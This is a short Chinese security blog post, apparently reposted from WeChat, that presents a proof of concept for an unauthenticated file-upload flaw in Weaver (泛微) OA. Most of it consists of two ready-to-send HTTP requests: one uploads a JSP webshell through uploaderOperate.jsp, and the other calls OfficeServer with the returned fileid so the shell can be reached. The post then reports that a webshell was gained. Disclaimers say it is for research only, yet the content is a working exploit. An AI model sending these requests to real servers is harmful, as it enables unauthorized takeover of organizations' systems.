请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
这个漏洞在某次攻防活动中遇到,曝出的时间并不是太久,这次碰到之后也是成功复现了一波,简单记录一下过程。简单来说它是通过uploaderOperate上传,OfficeServer移动实现文件上传。
POC如下所示:POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1Host: x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWjUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36Content-Length: 1822------WebKitFormBoundaryVdb2RRl25PuaGhWjContent-Disposition: form-data; name="secId"1------WebKitFormBoundaryVdb2RRl25PuaGhWjContent-Disposition: form-data; name="Filedata"; filename="c.jsp"<马儿>------WebKitFormBoundaryVdb2RRl25PuaGhWjContent-Disposition: form-data; name="plandetailid"1------WebKitFormBoundaryVdb2RRl25PuaGhWj--
PS:通过以上数据包,修改自己需要的马儿,然后发送数据包之后可以看到文件的fileid值,拿到这个fileid值之后再使用OfficeServer移动实现未授权任意文件上传getshell,这个漏洞需要发送两个数据包,数据包2如下所示:
POST /OfficeServer HTTP/1.1Host: x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWjUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36------WebKitFormBoundaryVdb2RRl25PuaGhWjContent-Disposition: form-data; name="aaa"{"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"115946"}------WebKitFormBoundaryVdb2RRl25PuaGhWj--
uploaderOperate上传:
然后查看文件上传的结果,已经成功拿到webshell。
原文始发于微信公众号(爱喝酒烫头的曹操):weaver-oa-workrelate-file-upload 泛微OA文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论